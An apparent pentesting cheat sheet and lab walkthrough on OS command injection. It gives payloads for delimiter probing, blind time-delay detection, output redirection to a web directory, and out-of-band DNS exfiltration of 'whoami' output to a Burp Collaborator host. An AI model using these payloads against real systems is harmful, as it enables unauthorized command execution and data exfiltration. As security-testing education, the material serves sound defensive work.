💎Command Injection

CMD injection Nuclei template Payload

%26ls||id%26

 https://vulnerable-website/endpoint?parameter=%26ls||id%26

How to Detect and Exploit Them?

Imagine you are testing the parameters of the following URL during a pentest:

https://vulnerable-website/endpoint?parameter=123 

To detect if the source code is not protecting against command injection, we can try a couple of methods:

Insert special characters to detect Delimiter:

We can inject some special characters to see if the application blocks anything that could be used for command injection:

&
;
Newline (0x0a or \n)
&&
|
||
??

In case the application doesn’t throw any error messages, we can try injecting our command after using one of these delimiters.

https://vulnerable-website/endpoint?parameter=1|whoami

----------------------------------------------------------------

Detecting Blind OS command injection:

Time delays

Most of the OS command injections are Blind, which doesn’t give any output for the executed command. To verify the vulnerability, after detecting allowed special characters, we can verify the command injection using time delays as below:

https://vulnerable-website/endpoint?parameter=x||ping+-c+10+127.0.0.1||

----------------------------------------------------------------

Redirecting output

You can also redirect the output of the command in an output file and then retrieve the file on your browser. A payload similar to the following can be used:

https://vulnerable-website/endpoint?
parameter=||whoami>/var/www/images/output.txt||

----------------------------------------------------------------

OOB (Out Of Band) Exploitation

You can also trigger an OOB network interaction with an external server such as Burp Collaborator. A payload similar to the following can be used:

https://vulnerable-website/endpoint?parameter=x||nslookup+burp.collaborator.address||

Or you can exfiltrate the output of your command using a payload similar to the following:

https://vulnerable-website/endpoint?parameter=||nslookup+`whoami`.burp.collaborator.address||

The most common parameters that can be consider while testing for Command injection can be found below:

• cmd

• exec

• command

• execute

• ping

• query

• jump

• code

• reg

• do

• func

• arg

• option

• load

• process

• step

• read

• function

• req

• feature

• exe

• module

• payload

• run

• print

----------------------------------------------------------------

OS command injection, simple case

Use Burp Suite to intercept and modify a request that Calls the Function query.

One by One Modify the Every parameter in the request body, giving it the value 1|whoami.

Observe that the response contains the name of the current user.

-------------------------------------------------------------

Blind OS Command injection with time delays

Use Burp Suite to intercept and modify a request that Calls the Function query.

One by One Modify the Every parameter like email parameter, changing it to:email=x||ping+-c+10+127.0.0.1||

Observe that the response takes 10 seconds to return.

-------------------------------------------------------------

Blind OS command injection with output redirection

Use Burp Suite to intercept and modify a request that Calls the Function query.

One by One Modify the Every parameter like email parameter, changing it to:email=||whoami>/var/www/images/output.txt||

Now use Burp Suite to intercept and modify the request that loads an image of a product.

Modify the filename parameter, changing the value to the name of the file you specified for the output of the injected command:

filename=output.txt

Observe that the response contains the output from the injected command.

-------------------------------------------------------------

Blind OS command injection with out-of-band interaction

Use Burp Suite to intercept and modify a request that Calls the Function query.

One by One Modify the Every parameter like email parameter, changing it to:email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||

Right-click and select "Insert Collaborator payload" to insert a Burp Collaborator subdomain where indicated in the modified email parameter.

-------------------------------------------------------------

Blind OS command injection with out-of-band data exfiltration

Use Burp Suite to intercept and modify a request that Calls the Function query.

Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard.

One by One Modify the Every parameter like email parameter, changing it to:email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||

Go back to the Collaborator tab, and click "Poll now". You should see some DNS interactions that were initiated by the application as a result of your payload.

-------------------------------------------------------------